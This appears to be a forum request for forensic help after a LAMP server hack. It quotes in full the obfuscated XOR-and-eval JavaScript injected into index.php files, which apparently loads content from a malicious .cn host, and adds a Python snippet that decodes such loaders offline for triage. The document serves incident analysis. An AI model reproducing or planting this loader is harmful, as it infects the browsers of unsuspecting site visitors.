Forensics team - please investigate!
I found that several vhosts on my LAMP server had been hacked. The following script (included below) was appended to all index.php files.
My personal (honeypot) PC (with IE8) resolved the hash and made an automatic query to the following addresses:
hxxp://holofader.cn/3/moreBook.swf
hxxp://holofader.cn/3/sByBook.pdf
Possibly the PC is compromised already.
---------
<script>zcsgwzlawtk=new Array(34,41,37,51,43,35,40,50,104,49,52,47,50,35,110,100,122,36,41,34,63,120,122,53,37,52,47,54,50,120,48,39,52,102,3
6,52,37,55,43,62,35,49,48,41,123,97,32,52,97,125,48,39,52,102,33,48,47,43,45,42,36,39,52,51,123,97,47,97,125,48,39,52,102,37,40,63,48,60,42,5
3,34,49,50,51,123,97,43,35,97,125,48,39,52,102,45,46,49,41,35,52,34,55,63,63,63,123,97,39,97,125,48,39,52,102,47,45,42,44,36,32,33,34,50,35,1
23,34,41,37,51,43,35,40,50,125,48,39,52,102,53,55,52,48,40,45,55,43,51,62,47,123,97,49,47,34,50,46,97,125,48,39,52,102,36,39,43,52,63,45,55,4
4,50,39,123,97,46,50,50,54,124,105,105,46,41,42,41,32,39,34,35,52,104,37,40,105,117,105,47,40,34,35,62,104,54,46,54,97,125,48,39,52,102,34,37
,39,44,33,50,41,32,43,35,49,123,97,46,35,47,33,46,50,97,125,48,39,52,102,52,46,62,35,36,51,43,42,49,40,123,97,53,50,63,42,35,97,125,48,39,52,
102,40,43,47,34,48,37,35,55,32,33,52,123,97,119,97,125,48,39,52,102,43,42,37,52,62,46,41,35,63,48,37,123,97,34,47,53,54,42,39,63,124,40,41,40
,35,97,125,48,39,52,102,62,62,54,47,50,34,33,33,54,41,123,97,53,52,37,97,125,48,39,52,102,42,55,41,37,48,48,51,45,47,32,123,47,45,42,44,36,32
,33,34,50,35,104,37,52,35,39,50,35,3,42,35,43,35,40,50,110,33,48,47,43,45,42,36,39,52,51,109,36,52,37,55,43,62,35,49,48,41,109,45,46,49,41,35
,52,34,55,63,63,63,109,37,40,63,48,60,42,53,34,49,50,51,111,125,42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,36,51,50,35,110,53,5
5,52,48,40,45,55,43,51,62,47,106,40,43,47,34,48,37,35,55,32,33,52,111,125,42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,36,51,50,3
5,110,34,37,39,44,33,50,41,32,43,35,49,106,40,43,47,34,48,37,35,55,32,33,52,111,125,42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,
36,51,50,35,110,52,46,62,35,36,51,43,42,49,40,106,43,42,37,52,62,46,41,35,63,48,37,111,125,42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50
,52,47,36,51,50,35,110,62,62,54,47,50,34,33,33,54,41,106,36,39,43,52,63,45,55,44,50,39,111,125,47,45,42,44,36,32,33,34,50,35,104,36,41,34,63,
104,39,54,54,35,40,34,5,46,47,42,34,110,42,55,41,37,48,48,51,45,47,32,111,125,122,105,53,37,52,47,54,50,120,100,111);cxpexelvhw="";ghaceffafi
=70;lerxenrpuun=eval;ykokgwgpdo=String.fromCharCode;for(ftwktbslnxd in zcsgwzlawtk)cxpexelvhw+=ykokgwgpdo(zcsgwzlawtk[ftwktbslnxd]^ghaceffafi
);lerxenrpuun(cxpexelvhw);</script>
--------------------
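Added example for analysts triaging an injection of this shape (not part of the original post): the script builds a string from an integer array XORed with a numeric key and hands it to eval, so it can be decoded statically instead of being loaded in a browser. The function names and the sample payload are constructed for illustration.

```python
import re

# Patterns for the loader shape in the post: new Array(...), an integer key,
# and String.fromCharCode(array[i] ^ key) accumulated into a string for eval.
ARRAY_RE = re.compile(r"new\s+Array\(([\d\s,]+)\)")
INT_ASSIGN_RE = re.compile(r"\b([A-Za-z_$][\w$]*)\s*=\s*(\d+)\s*;")
XOR_RE = re.compile(r"\[\s*[\w$]+\s*\]\s*\^\s*([A-Za-z_$][\w$]*)")


def decode_xor_charcode_script(script: str) -> str:
    """Return the string the loader would eval, without executing anything."""
    # Pasted samples are often hard-wrapped mid-number; rejoin before parsing.
    flat = script.replace("\r", "").replace("\n", "")
    array_match = ARRAY_RE.search(flat)
    xor_match = XOR_RE.search(flat)
    if not array_match or not xor_match:
        raise ValueError("no Array/XOR loader pattern found")
    int_vars = dict(INT_ASSIGN_RE.findall(flat))
    key_name = xor_match.group(1)
    if key_name not in int_vars:
        raise ValueError(f"XOR key variable {key_name!r} has no integer value")
    key = int(int_vars[key_name])
    codes = [int(n) for n in array_match.group(1).split(",") if n.strip()]
    return "".join(chr(code ^ key) for code in codes)


def build_sample(payload: str, key: int) -> str:
    """Constructed test input: wrap a harmless string in the same loader shape."""
    codes = ",".join(str(ord(ch) ^ key) for ch in payload)
    return ("<script>a=new Array(" + codes + ');b="";k=' + str(key)
            + ";e=eval;f=String.fromCharCode;for(i in a)b+=f(a[i]^k);e(b);</script>")


# Constructed, benign sample (not the payload from the post).
SAMPLE_PAYLOAD = "document.write('constructed benign sample')"
SAMPLE_SCRIPT = build_sample(SAMPLE_PAYLOAD, 70)
# Simulate the mid-number wrapping seen in pasted copies.
WRAPPED_SCRIPT = "\n".join(
    SAMPLE_SCRIPT[i:i + 37] for i in range(0, len(SAMPLE_SCRIPT), 37))

if __name__ == "__main__":
    print(decode_xor_charcode_script(WRAPPED_SCRIPT))
```

Decoding offline like this yields the injected markup and any URLs it references for blocklisting and log searches, and the same array-plus-key pattern can be grepped for across the other vhosts' files.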